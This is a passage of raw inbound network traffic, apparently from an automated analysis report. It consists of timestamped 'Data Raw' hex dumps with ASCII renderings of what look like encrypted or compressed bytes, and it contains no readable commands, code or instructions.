7e f6 ac 8c f0 9a 7f 78 99 f9 f1 6c b4 f0 03 bb d2 ee 55 43 21 8a a9 87 c2 85 82 87 89 8e 72 b1 7b 8a Data Ascii: (}8q)) GyIm(!xY0?{l$-7d<w(p6L{MTg0RWr;:I$wI8 ~ut3kW.rV&qwd!Mo?:mzQ5Lz0.p'-oEX'`AC<NxbJbL?wIqQU-~xlUC!r{
2021-11-22 13:07:59 UTC	96	IN	Data Raw: ef 39 bd 32 4a 47 5e 05 83 c1 8a 47 17 56 09 84 a3 81 59 7a c2 b1 e2 8e c6 7b 9c 2c 21 b0 23 33 29 96 7c 4a b5 c5 6e 70 b3 9e d4 20 46 fb 08 c8 7c ab 22 02 59 b8 9e 3f 14 0c 8d 3e fb bb a9 9f 05 78 1a ea 09 7f 70 f9 20 31 19 bd 3b 0b bd 4f e0 b3 e0 1b 5a 2f dc cd d9 77 e2 59 21 17 89 47 40 31 cf 5a 81 72 54 b3 f3 05 46 2d a6 f3 3e 79 f3 6b df 2d de 94 fb 29 20 b2 ec 0b 3e ae 6c 29 b0 53 a4 1f 9c c7 ce 0b 6d eb fd c3 da b9 d5 04 e7 52 94 fe db a7 fc dc 9e 4c de db 01 27 80 f3 d3 78 f8 4c e9 18 5e 1a 8e fa fd 47 24 c2 86 5a 02 f2 3c b7 3e e8 95 a4 9c 26 5c 09 8a ac 31 98 ea 41 6e 1d c4 35 1e be 56 b8 ab 5f dc 30 53 b6 52 1f 67 ce 6a 0b 4e 78 8a 1e 9c eb 1c e0 90 db 1f 12 c7 be 37 21 49 86 33 5e 4c 2f 20 d6 a4 23 e3 47 19 52 74 5c fb 83 24 5b 6c 26 78 50 b0 Data Ascii: 92JG^GVYz{,!#3)\|Jnp F\|"Y?>xp 1;OZ/wY!G@1ZrTF->yk-) >l)SmRL'xL^G$Z<>&\1An5V_0SRgjNx7!I3^L/ #GRt\$[l&xP
2021-11-22 13:07:59 UTC	97	IN	Data Raw: 6d eb 1e dc 72 45 0d 7a 97 ca 36 16 52 19 84 f3 e4 71 25 78 4e ee 4f 1d d6 18 a3 da 77 99 4e c4 dd 56 9b bc cb 13 d1 d8 6f 03 ff 6d 78 26 8c d6 08 68 f8 2e 4f 4b 39 b0 18 e4 a7 46 20 25 70 be d7 5b 1c 6d fc 4a 29 b5 0c 4c 8d e9 75 e9 fc 23 eb 32 a2 c4 24 63 5c 81 27 0d 14 e1 6d 5f a2 bc fa 16 d1 5d 3c 6d 46 c6 5b 48 c6 62 e3 f4 5e 39 50 41 b4 9f f3 8c e3 7a 83 07 f1 54 aa e2 2c 65 39 ee 5f 6f 2b 99 ac 8d bc ed 97 79 82 84 60 a2 40 ab bf 50 b6 f6 fe 7a fe 6b d2 69 16 e6 e7 8e 4f 62 f8 93 96 b1 bd 74 0d 3b fc 02 14 5d 0f e8 93 ca 75 00 4c e1 e2 f2 c7 cf bd 7e 83 ff 96 e2 1a 79 83 3a c9 51 29 a3 f1 17 f0 87 6c 38 aa 06 ee 9f bd 46 77 ba 96 2d 1a c7 c7 09 04 5d 3a 47 04 1a da ae f2 04 28 7f 24 f7 23 c5 14 46 11 2c b1 c6 c9 44 39 9b 9c 64 e5 62 c0 cc 94 d6 82 Data Ascii: mrEz6Rq%xNOwNVomx&h.OK9F %p[mJ)Lu#2$c\'m_]<mF[Hb^9PAzT,e9_o+y`@PzkiObt;]uL~y:Q)l8Fw-]:G($#F,D9db
2021-11-22 13:07:59 UTC	98	IN	Data Raw: c0 70 b9 04 23 0a 4d f7 4c 11 81 13 77 ee af 0e d4 49 7a d6 2a 76 3b 99 78 06 46 b2 44 2a 97 a2 c5 43 15 61 24 38 04 fe 4a 3d 9d 03 15 9d a5 8c c8 7b b1 2c 5d 7f fb 5c 8a c9 de 3c d6 60 d6 9b e5 11 68 31 7a 38 4a 7b 6f 10 96 8b 3e b1 91 d3 0d 4f 31 9e 9d ae 82 7f ef a6 1b 03 40 57 7a d9 7d 08 17 1f fa 0b 3e 17 07 8f c7 2b 01 48 10 99 f6 f1 96 da 55 6b ec 23 48 5b 19 a9 ce 48 95 54 d9 d8 45 79 43 e6 35 df d9 11 95 f0 6c 7c 3e 82 df 08 71 e7 c8 b0 66 18 bc 64 74 d4 f2 2b 58 79 b5 ce 4c 02 61 ed 47 21 b5 0c 4c 98 f9 5c 17 f3 8a e0 cc a5 9b 5d 4a 59 b3 09 8e e9 1e 60 78 ae 85 ea 13 70 4c 39 74 69 c7 77 52 d3 73 94 78 cd 39 56 4a ae 9d f2 9b 0c 7e b5 fa e8 6b a4 e4 3a 1c c9 10 5e 47 35 93 a3 91 be ec 80 96 87 b6 9d bb 7f a5 b6 43 ce e4 f6 84 fb 58 d1 73 7d 9b Data Ascii: p#MLwIzv;xFDCa$8J={,]\<`h1z8J{o>O1@Wz}>+HUk#H[HTEyC5l\|>qfdt+XyLaG!L\]JY`xpL9tiwRsx9VJ~k:^G5CXs}
2021-11-22 13:07:59 UTC	99	IN	Data Raw: 7b 25 d6 84 a7 bc 57 00 19 b1 fd 99 ba 85 9c 3d 2e 85 28 de 18 b8 69 0b b7 be 60 71 b3 9a bb a4 6c ec 02 c1 ac 11 e3 74 a7 b4 8d 3e 17 35 07 20 ef 4f 84 b8 22 54 63 e4 0e 0c 52 94 d7 3b 63 b3 32 2c a6 4e c0 5d 1a 00 a4 1f fb ee f5 0e f2 5e 52 44 a4 5a 56 58 c8 59 ed a8 4b be 09 06 6e 59 4e e2 3a 4c 98 74 d1 2d eb 97 ea 69 3d 4c ed 27 2a b8 6e 50 bf 56 8c a9 f2 4d ca 0e 4f 73 26 d0 d4 99 c0 3f cc 50 85 fd b1 7f ff f0 84 34 ab d1 28 a8 85 9c 5f 56 f3 6e 7f 10 44 0f f8 dc ee 42 31 b1 7a 4c 53 03 3e cc 34 eb 90 ae f7 88 26 09 80 a7 53 70 f9 44 6a 26 c1 2a 0f 53 67 90 bb 97 db 5e d6 b0 3c 9a 08 1f 43 1c 48 67 92 0f 8f 96 e1 e5 88 21 1c 28 b5 51 4c 33 4c 84 34 34 92 33 df 2d 59 3e 8d a4 19 43 75 41 c8 7d 65 76 60 a9 28 43 b1 81 ae 81 4f ab 23 92 e1 04 22 b1 bb Data Ascii: {%W=.(i`qlt>5 O"TcR;c2,N]^RDZVXYKnYN:Lt-i=L'nPVMOs&?P4(_VnDB1zLS>4&SpDj&Sg^<CHg!(QL3L443-Y>CuA}ev`(CO#"
2021-11-22 13:07:59 UTC	100	IN	Data Raw: 46 1c fa 5f f9 8f 2e 53 56 e3 98 0e 0e 13 ae d2 0e ac 9b d1 b7 ba 65 bd ed 1a ad c7 13 e8 fb 73 4f 3c 96 bc a2 79 fd 3c a6 60 15 a0 2a e4 d4 dd 21 25 76 6f ce 48 08 1e 61 4f 37 41 01 62 99 e6 3f dc fa 95 ec 1e a8 b3 57 0e 29 8b 54 7b 47 f6 6c 8c ac b1 fd 42 c7 47 e7 7e b0 eb 71 4b aa 37 90 40 55 e5 51 60 ae 8d e6 8c f2 7d 99 ff f0 65 83 e4 21 18 d2 ee 5f 70 00 8f a9 8a ac e8 80 5b 83 a8 72 b8 03 d5 b1 40 b3 ed 82 b8 ff 47 d9 4d 72 b3 cb 8c 45 7b 81 03 91 b1 a6 0b 19 95 92 e7 16 4a 1a e7 bb 48 72 1f 4c 12 cb 4d c7 e4 b2 4a a5 7e fa 1d 30 6d a9 e1 f8 53 2f 8b f5 11 9f de 6e 38 b1 01 e3 a0 8a 57 77 e6 94 2f 1a cc c7 08 15 48 17 66 93 18 d0 b5 db 24 06 28 33 86 bc aa de 46 3b 29 b5 a6 da 40 22 88 7d 76 3a 6c e1 ec b2 d3 f9 e6 5a 6f ad 61 29 e1 a4 4b 0e 3d 96 Data Ascii: F_.SVesO<y<`*!%voHaO7Ab?W)T{GlBG~qK7@UQ`}e!_p[r@GMrE{JHrLMJ~0mS/n8Ww/Hf$(3F;)@"}v:lZoa)K=
2021-11-22 13:07:59 UTC	102	IN	Data Raw: b1 ec 0b e1 ae 6c 3a a5 44 8a 95 3c c4 c8 0e 45 75 fa df 2e 94 f2 3c c1 53 ef e2 a9 81 fa b3 0c 36 d0 d5 22 b5 92 f5 d9 45 f5 7b db e4 5f 30 e9 de 84 49 2f b8 80 4a 69 14 b2 00 55 43 90 aa 92 11 39 1a 8c aa 5d 7c f5 5b 94 36 e8 2e 1c d6 68 bd ab 91 fc 30 d2 b6 52 37 fe ce 42 16 58 60 ef b5 8a 96 fa ff 8b cc 1b 04 ab 55 28 3f b3 85 1c 37 ab 54 2e d3 a6 23 98 b7 1f dc c7 31 72 83 64 50 73 b4 40 56 b0 90 ac b6 ae b5 1b 84 cf 8c 28 a7 ab d5 60 6f 9c b9 62 09 26 c7 7a ad 86 8e 36 c3 4c d6 ae d4 7e e6 91 58 a9 07 95 3e 06 70 f7 2e a4 5a 42 89 d8 31 14 63 ad ce c2 d4 41 5a d2 44 6a 84 1a 1d 6d ad 73 f7 55 16 a7 15 05 17 4d 27 17 14 80 cc 80 25 ad a5 87 5b 98 b5 7a 04 da 69 40 2d 9e e9 ca 9f 5d b2 2a 88 61 fe ba c0 58 af c7 b0 b3 a1 c1 ff c0 11 30 e3 61 2e ac 8f Data Ascii: l:D<Eu.<S6"E{_0I/JiUC9]\|[6.h0R7BX`U(?7T.#1rdPs@V(`ob&z6L~X>p.ZB1cAZDjmsUM'%[zi@-]*aX0a.
2021-11-22 13:07:59 UTC	103	IN	Data Raw: e3 e3 7c a0 f5 2f 07 cb 10 5e 47 2a 88 d2 83 ac e8 84 80 0d 1f d5 92 ca ac bf 4b a5 f1 98 2d ff 47 d2 7f 63 88 e1 8e 54 79 ed 90 6d b0 80 66 19 be f3 2f 17 4e 1a c5 08 d9 70 15 50 01 8c 77 c5 e4 b2 59 bd 13 6d 1d 21 63 9e 2f 07 52 05 b3 f3 6c fe 4b 6c 3c a1 9f ce 8b b7 44 7c c7 17 32 4a 5a dd 1a 09 12 8e 00 1d 06 4c b6 ef 13 98 71 34 99 db 6c 14 47 31 30 96 ab cf 44 22 89 11 91 3a 40 e6 fc b0 d2 82 ed 5f 70 be 8e 2d b6 bb 48 75 37 f8 8a 20 06 73 0b d4 e3 a0 53 2c b7 7c 21 0d 88 13 45 76 1e a0 1b 79 7d ed 01 7d 08 3c c0 74 0f be 3f 80 1c bd 34 b1 8d 47 95 20 e7 5c 6e 7c 1b 8d f8 5c 3f 85 2b 36 c7 f0 a2 cf f5 3b dc 5e 95 5b 10 93 5a 2e 1e 76 05 db 07 f1 a6 4d ae 13 35 8d c3 e8 9d fc 41 b8 98 93 fe f8 97 e8 da 4f ba aa c1 bd 49 9e 2d 5c 7a be c1 a0 41 d6 03 Data Ascii: \|/^G*K-GcTymf/NpPwYm!c/RlKl<D\|2JZLq4lG10D":@_p-Hu7 sS,\|!Evy}}<t?4G \n\|\?+6;^[Z.vM5AOI-\zA
2021-11-22 13:07:59 UTC	104	IN	Data Raw: 6e 97 38 23 b8 27 3f c6 58 26 b2 ac 1e 54 fe e9 e0 12 9a a5 93 b4 46 43 b8 81 bb a4 4f be c9 80 c8 08 30 e4 b8 a8 51 68 83 a6 83 03 19 ed 78 c7 80 90 2f 39 4f f9 db ca 2f f7 90 59 06 1d 94 38 2a f5 ef 3d a6 4c 49 ee 6e 2e ea 68 9e de d2 82 57 36 cd 5a 60 7e 04 11 71 a6 08 c3 5c 09 b5 d2 cd 3b 5c 24 58 64 8a cb 80 30 b5 f8 c0 a4 4b 5a 6d 10 b2 45 41 3c 92 9c ac 9e 71 b7 22 ed 7c f9 ba d5 31 30 3b b1 95 a5 f2 7b c8 11 2b e7 63 c3 ab a3 48 db 2b 60 4d e4 f1 38 81 bf 76 e4 b6 cd dc 49 7a c8 39 47 5b 98 54 14 44 c1 51 d5 96 8a d6 7f 7e ec 2a 38 06 ea ab 36 a2 03 66 37 ac 93 d2 8e a9 0c 51 75 9d a9 8a e5 d3 16 95 02 c5 89 ed 15 67 35 65 2b ab 73 bd 1f b9 d1 42 ac ed c0 08 51 06 ab 88 be 91 7f f8 49 12 38 bc 4e 5a da 6d 05 e1 1e c7 09 2f f1 7b b1 c5 3c 16 5f 19 Data Ascii: n8#'?X&TFCO0Qhx/9O/Y8=LIn.hW6Z`~q\;\$Xd0KZmEA<q"\|10;{+cH+`M8vIz9G[TDQ~86f7Qug5e+sBQI8NZm/{<_
2021-11-22 13:07:59 UTC	106	IN	Data Raw: 1b 76 dc 82 98 d4 11 3c 27 2e 99 bc de 2a 73 13 07 6f 3b 73 ea f7 ab d6 93 f4 44 78 57 71 00 83 85 49 06 26 f5 5c 0c 24 ff 20 de cb 09 5c 25 ab 1e 50 90 81 00 45 25 91 a1 03 73 e9 fe e6 60 b8 30 f1 fe 88 a4 2c 96 91 bc 37 b5 ef 4f a4 3a 7c 4a 72 22 f3 25 f8 5c 2a 89 20 2d c3 e1 bb d4 ff d0 23 73 b5 40 68 91 1b 5c 1b 7a 1a d2 02 e6 ae 5c bb 04 21 60 3c c5 98 f1 39 be 87 45 d2 71 ee e4 d1 5c b8 da 5f ac 41 94 56 56 1e a2 3e a1 69 14 2e d4 8c bc 89 8d 29 25 b0 e2 80 d4 9b 9d 2c 2f 85 2d 33 11 94 6d 04 aa cc 90 71 9f 91 d7 2a 71 e6 de e0 fd ab 34 75 b5 a7 94 28 1f 24 13 37 e0 4f 84 b8 26 55 10 c2 84 0e 56 f1 2b 27 70 b1 2d 28 bd 54 d1 b2 1e 37 4e 1b d4 ed e8 69 34 77 6e 41 88 4d 37 56 cc 59 f8 b2 46 a0 ff 07 53 58 59 fc c0 7c f5 7f da 3d e6 88 ef ba 08 8e ed Data Ascii: v<'.so;sDxWqI&\$ \%PE%s`0,7O:\|Jr"%\ -#s@h\z\!`<9Eq\_AVV>i.)%,/-3mq*q4u($7O&UV+'p-(T7Ni4wnAM7VYFSXY\|=
2021-11-22 13:07:59 UTC	107	IN	Data Raw: 46 de b2 1d 97 a3 4d 4b 0b 9d e9 fd 9d 5d b2 33 9e 75 97 15 d3 5e bc 2a b5 98 c7 46 6a c0 1b 37 fe 7e 2c ac 03 be fb 2b 21 65 d7 7d 13 8b bd 0c e0 ae de d0 26 f6 c2 26 44 29 08 78 06 47 ac 77 48 97 8e cb 44 09 6b 22 e6 7f e4 a5 34 cc 1a 67 26 a0 8e df 74 bf 4a 87 c0 f1 74 06 ce d7 3b d5 60 c8 9b e5 11 74 46 74 31 55 76 98 07 d5 11 3b b5 e6 e6 0e 34 3b 80 97 a6 80 0c e8 59 1a 2b 54 5e 72 6e 1a 4d e9 1e dc 27 3b 74 74 9c c6 2f 0c 41 76 05 f4 f9 85 02 43 4d 38 02 62 af 16 a8 c4 60 f3 c8 d7 d8 47 73 d7 da 71 28 21 ed 36 f3 45 4b 3a 9f d9 20 41 fd 36 bb 94 15 ad 30 e1 fe b3 3d 25 76 b4 ce 48 19 7f ed 4f 37 fd 0c 60 9a 26 51 17 fb 99 ea 32 a4 ad 5f 61 5d 98 64 73 16 c9 67 52 bd bd e9 13 c0 5a 32 5f a3 c7 70 54 3b 61 bc 42 47 32 56 4d b8 72 f7 a0 f0 68 92 f9 f7 Data Ascii: FMK]3u^*Fj7~,+!e}&&D)xGwHDk"4g&tJt;`tFt1Uv;4;Y+T^rnM';tt/AvCM8b`Gsq(!6EK: A60=%vHO7`&Q2_a]dsgRZ2_pT;aBG2VMrh
2021-11-22 13:07:59 UTC	108	IN	Data Raw: 3c 1e a2 5c ac 1b b3 74 c2 c4 b5 ed 3e a7 9d 85 ed 76 c3 e4 db 4e 1c d4 4f ab 5d 82 50 76 a9 af c0 aa 42 14 03 3b 80 a3 83 4d 8c 1e b1 e2 8b bd 94 88 3b 03 3d 23 20 13 b2 57 56 b2 d1 46 9d b7 9e d2 34 e3 eb 08 c8 77 bd 20 6b 90 1b 9e 3b 1d 30 2a d1 ff b1 83 82 a0 51 18 ea 0e 18 42 ef 08 98 63 b9 27 11 a4 4b c0 46 13 13 4e 36 38 e1 f7 73 f5 d2 55 40 88 46 59 4f dc 5d ea 85 a4 b7 f7 01 e0 41 42 e7 2a 69 f1 c8 df 3e e4 bf 4e 6c 20 b8 c0 09 15 96 6b 3f 9b ba 88 ad 9b d1 45 09 45 64 fd d7 c4 81 f6 8f c9 50 9e ec 80 70 fa dc 92 20 5d d8 29 a8 80 e7 cd 40 db c7 c7 1a 54 34 49 dc ff 4d 06 0d 84 4d 75 29 52 48 c5 15 97 be b0 fc 20 09 8c bc c1 7d ea 41 6b 23 d0 21 36 0e 66 bc a1 bd 86 30 53 bc 58 c1 77 e9 6a 2b 4e 78 8a 11 9c 9c d8 d8 90 df 17 da ba 55 1d 21 4d 84 Data Ascii: <\t>vNO]PvB;M;=# WVF4w k;0QBc'KFN68sU@FYO]ABi>Nl k?EEdPp ])@T4IMMu)RH }Ak#!6f0SXwj+NxU!M
2021-11-22 13:07:59 UTC	109	IN	Data Raw: e5 ad 18 b3 fd c4 1d 42 5a 06 96 a2 88 5f 03 5c 1a 29 2d f9 74 d9 7f 79 60 1f d6 0b 11 28 7a 9d cc 20 db 7d 08 84 99 3e 8f 24 5e 7d 9f df 9f 2b c6 bf d5 75 e9 75 d5 d8 4c 49 b1 f6 08 a3 e5 12 e8 fe 02 2b 3a 9f d9 d4 51 08 32 b1 4c 3f bc 30 e7 d4 f2 60 41 76 b4 cc 48 19 6d c0 4f 37 4b 06 60 9a ee 68 17 fb 95 e6 32 a4 b7 5f 61 5c 8b 56 71 16 e1 23 52 bd b5 c3 12 d1 4c 57 75 b8 c7 61 43 c5 60 90 40 5f 39 54 4a ae 8c 7d 8d f2 7f 81 f9 f0 78 03 e5 2b 18 de ee 5f 6b 30 8a a9 8d af e8 80 87 3a a9 63 ba c9 ae bf 41 e0 eb f7 84 e9 47 d8 60 79 9b e5 8e 5e 4d fb 80 66 b3 ac 71 f7 c5 fd 3f 09 c7 37 ed 93 da 63 16 35 b4 e3 de cf f7 be 57 aa 14 41 99 32 67 87 36 74 54 29 98 f0 04 fe 5b 62 2e aa 1b 47 9a b9 56 7e df 0e 39 0e d1 59 22 16 59 13 1a 15 0b c0 a9 e1 92 15 68 Data Ascii: BZ_\)-ty`(z }>$^}+uuLI+:Q2L?0`AvHmO7K`h2_a\Vq#RLWuaC`@_9TJ}x+_k0:cAG`y^Mfq?7c5WA2g6tT)[b.GV~9Y"Yh
2021-11-22 13:07:59 UTC	111	IN	Data Raw: e0 e5 f7 7f f1 5a 7a 46 8d 47 4c 41 e5 61 fc ad 5e 6d f7 01 68 50 46 f2 22 7d d9 69 df 26 ee a8 ac 6c 2c b2 ec 0b 3e ae 6c 2b b3 30 eb ad 88 dd c8 0e 44 7f cc c0 d0 39 de 2c c9 be 94 f8 b9 a9 f9 d9 94 30 a3 64 2b a8 8b ff d1 3b 4f 66 c7 10 53 62 6e dc ff 4d 25 b1 eb 2e 7f 13 36 a4 3c c1 c8 bb 9e 61 40 09 8a a0 38 38 ea 41 6b 24 c0 32 60 3e 66 bc a1 fa c5 31 53 bc 7e 33 76 c8 6a 14 4b 78 86 73 4a 94 f0 ea b8 6a 1d 04 b0 7f 25 30 49 ac 39 26 a9 29 4f 12 a4 27 94 ce 0c 52 70 54 d0 92 60 35 ad a9 53 5a b7 a9 4f af 50 b2 49 12 e4 04 39 db d5 d5 71 63 88 b3 9a 67 6c e5 78 dc a5 10 e8 cb 5f d3 f9 ce 6e e0 fa 60 7b 06 9f e4 29 e0 2b 3b 8b 64 6f e6 71 3b 07 6c 9a d8 d4 d2 47 41 fc 63 60 7a 11 ef 62 a8 22 d3 48 16 a3 2e cc 0f 4d 4a 8d 1f 9f ca 80 34 ab b8 79 5a b4 Data Ascii: ZzFGLAa^mhPF"}i&l,>l+0D9,0d+;OfSbnM%.6<a@88Ak$2`>f1S~3vjKxsJj%0I9&)O'RpT`5SZOPI9qcglx_n`{)+;doq;lGAc`zb"H.MJ4yZ
2021-11-22 13:07:59 UTC	112	IN	Data Raw: 4e 8a 54 7b 3e b6 65 52 bb 9d c7 11 d1 4a 56 0c b8 c7 7d 48 c7 66 ff 8a 5d 39 5c 50 b4 9a 99 78 f3 7f 9f d1 e2 79 a0 ee 03 4f d0 ee 59 43 1e 88 a9 8b c2 90 80 87 89 a5 61 bc 3c 64 bd 41 b9 f6 fb 9e e8 28 2c 61 79 9d f3 a6 50 7c f2 8a 9f b6 84 60 1e c5 fb 41 0e 4b 1c e7 aa 6c 71 1f 46 37 f1 db c5 e2 b5 4f 84 13 6c 1d 36 08 98 20 f9 59 05 94 f8 3f e4 4f 6c 3e 93 36 e5 8b bd 48 73 c8 6e e7 18 c6 de 12 2e 43 04 66 f1 1b d0 b9 de 1c 05 78 28 ab e3 c7 14 41 13 01 9b b8 cd 2b 4b 8d 06 65 13 59 e7 e4 a9 c5 85 eb 48 67 91 21 2d 9a 80 5b 09 3b 82 bd 25 18 fa 4f 1f e1 a1 54 ff b9 bb 66 4b 96 d2 d7 28 82 a9 02 71 e8 f2 09 66 96 4e ed 63 93 b3 4b 5d 82 b4 22 7d 09 96 9f ec 68 44 6b 68 5f 1c e9 55 24 90 31 23 ac 3a b1 cb e0 26 33 57 61 49 b8 97 51 36 c2 ac 02 da 7b 01 Data Ascii: NT{>eRJV}Hf]9\PxyOYCa<dA(,ayP\|`AKlqF7Ol6 Y?Ol>6Hsn.Cfx(A+KeYHg!-[;%OTfK(qfNcK]"}hDkh_U$1#:&3WaIQ6{
2021-11-22 13:07:59 UTC	113	IN	Data Raw: 28 e7 26 15 ad 77 b7 b4 89 22 31 7f ba 43 19 7f a3 bb 1d 4e 7e 9f 01 99 9d f0 f1 9b c0 2a fa bb 7f 3c 52 4d 86 30 25 ba 27 3f ea b5 2c 9e b0 12 4d 4f a0 da af 6f 59 65 bc 85 c1 a3 85 b5 ec 43 bf 37 90 ef 1b 73 4a ac f9 60 6a 8a ba 4a 00 1c f4 7c fe 9f 8e 36 cd 51 94 c6 c2 7f f7 9e 28 5b f8 94 14 3b e3 ed f8 ad 45 4f 30 e0 e7 17 e7 05 ec bb d3 41 4b cb 7a 73 71 1b 20 69 b1 2c 2c 55 3a b2 2f c5 0f 9b 2f 1e 0e 97 e2 97 35 ab b2 66 7f a7 ae 72 16 aa 52 67 d3 9b aa 74 96 4a 6e 27 f9 8e f9 ba d7 59 d9 c5 b0 9f ae 86 b8 c2 11 30 f8 a1 52 7b 8d 46 f1 44 da 4c e4 7a c5 8c a0 50 fd a4 de c5 42 74 fb d8 4f 89 8a 7b 0f 51 6c ce c3 4c 99 17 e5 26 7d 28 39 00 f9 88 2f ba 0b 77 2d bb a2 30 71 84 35 54 6f 30 a1 82 f2 01 aa 02 1e 56 2d db 5a 77 3d 7a 2f 7a 61 9a 11 ab 8a Data Ascii: (&w"1CN~*<RM0%'?,MOoYeC7sJ`jJ\|6Q([;EO0AKzsq i,,U://5frRgtJn'Y0R{FDLzPBtO{QlL&}(9/w-0q5To0V-Zw=z/za
2021-11-22 13:07:59 UTC	114	IN	Data Raw: cd 53 e3 96 47 b8 f7 16 49 4f 49 0d 3f 51 c9 7a da 3d e7 80 2d fd 4f 49 ed 0b 38 b1 7c 38 b8 57 9d a6 82 cb 36 0f 69 6d c4 11 2c 6a 21 33 c4 43 9f f8 b9 8a e1 c6 6a 37 fc d3 38 a2 99 b3 e0 a8 0c 9b d8 01 4d 17 fd cd f4 58 24 46 85 61 6e 14 3f 39 8d e3 88 7c 42 61 df 08 8a ac 53 71 f9 4a 6a 26 cf 2a 20 53 67 90 a2 ad 20 cc ac 49 4d 20 74 c7 42 0d 45 67 b4 e2 8b ba d6 e9 87 09 1a 6b 46 52 37 27 4a eb cc 22 a9 29 4f 02 a4 27 94 b6 c3 3d a1 5c db 89 0b a0 6d ab 55 86 bd 9e 9f bf 5b b4 26 8a fb 2d cd b5 81 de 02 69 81 a2 9a 1b 0d fa 52 c5 83 8f 27 cc 51 ec 2b c8 53 f6 84 3f 78 0f 82 ee bf 85 0e 2f ae 4a 47 dc 62 3a 14 78 b9 cd cc 2c 40 67 c4 4a 66 79 12 26 b4 3f 67 29 55 16 a5 33 d2 04 46 27 19 14 88 34 81 18 ad ae 6a 5e a8 b6 79 07 b0 46 5e 1d 64 87 7e 96 65 Data Ascii: SGIOI?Qz=-OI8\|8W6im,j!3Cj78MX$Fan?9\|BaSqJj&* Sg IM tBEgkFR7'J")O'=\mU[&-iR'Q+S?x/JGb:x,@gJfy&?g)U3F'4j^yF^d~e
2021-11-22 13:07:59 UTC	115	IN	Data Raw: be 97 3b 74 b2 c5 72 3e 8c 61 90 44 5d 37 52 37 e4 8d f6 88 f0 7d e2 b1 f1 78 a4 8b 12 19 d2 e4 33 48 30 8a a9 8d ad e8 a0 c7 d8 80 f2 ba 53 a4 08 3c f0 e8 f7 80 fd 45 a3 23 78 9b e1 99 9f 6a 24 0d b8 b1 ac 70 66 80 fc 2e 13 60 1c ed 93 c8 40 1a 46 60 e2 de c5 13 b8 46 bd 16 7a 18 08 0e 80 21 f9 53 38 9d e6 e9 f1 66 6f 20 a8 17 e5 9a b2 5c 8f cf 2d 28 0c cb ce 1e 13 59 03 0c 1d e4 d1 93 f8 0d 13 a2 35 55 39 ee 14 47 3a 23 80 ab ce 44 22 88 1a 91 3a 40 ef e7 a5 ea 00 fc 5b 6f b4 63 29 9a 91 4f 11 30 07 8b 08 1e f6 0a cb e9 b2 5b 25 b0 66 6f 6f 80 28 48 3f 80 d2 45 63 e1 e0 1b b7 e9 73 db 62 97 a8 2d 85 85 b4 39 a2 0a b0 89 1a 71 53 6e 5c 82 24 f8 5c 29 89 36 25 d2 f5 a9 35 eb 02 33 5d c2 16 6f 86 5f 2c 61 3c 1b cd 10 2f ac 47 b9 09 3e 62 c7 d9 4a ff 16 a1 Data Ascii: ;tr>aD]7R7}x3H0S<E#xj$pf.`@F`Fz!S8fo \-(Y5U9G:#D":@[oc)O0[%foo(H?Ecsb-9qSn\$\)6%53]o_,a</G>bJ
2021-11-22 13:07:59 UTC	116	IN	Data Raw: 89 52 1f 66 6e 53 1b 5a 50 2f 1c 8a 9c d8 0d 91 df 17 2c 66 51 37 2b d1 9b 3d 30 a4 2f 31 df b9 35 60 a0 35 70 61 58 cd 19 4c 4b 6c ab 59 80 a2 81 aa b7 78 a0 37 81 ee 2c 07 b5 ad df 05 7b 83 a2 87 02 15 f6 6b db 88 9e 3b de b0 d4 f9 d7 7d 9d dc 36 7b 02 83 31 5a 6b f5 2e af 5a 5a 9d 38 30 14 6d 3c 65 f9 e7 40 4b de 41 73 77 1b 20 6f b1 1e 2c 55 3a 8f 3d c7 03 65 a6 0a 1f 95 dd 0d 33 ab b8 78 49 b8 b4 7e 11 b0 4b 59 b7 b2 97 52 9f 57 1a 31 9a 66 ec ad c7 76 1e 39 b1 95 b7 fe 7b cd 11 2b e2 63 c3 ab a3 51 f9 50 69 4c e4 78 9d 36 a5 a1 f9 75 c9 02 c4 40 c0 26 4f a8 80 6b 0b 46 ab 52 c8 68 8f ed 62 05 09 3a 38 0c fd be 21 a2 06 66 37 a9 93 c7 8e a9 0c 6c 75 9d ea 8a e5 d3 33 a0 0f d8 9a fe 03 7e 29 52 b1 57 72 97 07 37 86 39 b5 ed d4 18 5b 1d 22 97 a2 88 5f Data Ascii: RfnSZP/,fQ7+=0/15`5paXLKlYx7,{k;}6{1Zk.ZZ80m<e@KAsw o,U:=e3xI~KYRW1fv9{+cQPiLx6u@&OkFRhb:8!f7lu3~)RWr79["_
2021-11-22 13:07:59 UTC	118	IN	Data Raw: 12 e1 e4 a3 47 71 c4 2b 1b 05 de 59 26 16 59 13 89 49 1b d0 bb dc 10 17 48 27 83 13 c5 14 47 c0 2f 99 a9 dd 57 36 a6 45 6f 2a 69 fd 1a a2 fa 8c fe 34 a6 a9 70 26 82 dd 5c 20 0b e0 99 21 18 ef 25 cd 1d a0 72 20 b5 49 6b 82 84 04 4b 38 95 57 02 4e e2 fc 0b 64 94 24 df 74 6d b6 08 95 97 a7 2d a7 00 4b 92 c8 7a 79 7a 49 76 0f 43 5e 5a 53 33 25 c9 9c 90 cb ea 2e 22 5f b9 51 2e dd 78 2e 1a 7a 1a cd 14 05 99 05 82 9d 3e 73 c8 73 a3 28 b7 9d 99 93 fb f1 fa e3 55 f8 a9 1f 58 bb 44 bf 65 5c 08 b7 18 b8 2a ef 2b d7 8e af 82 52 09 39 b2 e0 8a a9 a8 7e 2e 2b 90 0b c3 1b 94 76 90 bc d2 b8 7d ba 8f d0 13 b7 eb 22 c8 65 99 37 7f 07 b8 9e 3b eb 24 02 2e ed a2 80 ac 86 56 18 ea 0f 1d 53 e5 de 3a 4f b1 24 2e 63 46 df 45 0c 1e 5a 0f d2 fa fe 8b e3 73 59 49 99 43 c4 fc ff 0b Data Ascii: Gq+Y&YIH'G/W6Eoi4p&\ !%r IkK8WNd$tm-KzyzIvC^ZS3%."_Q.x.z>ss(UXDe\+R9~.+v}"e7;$.VS:O$.cFEZsYIC
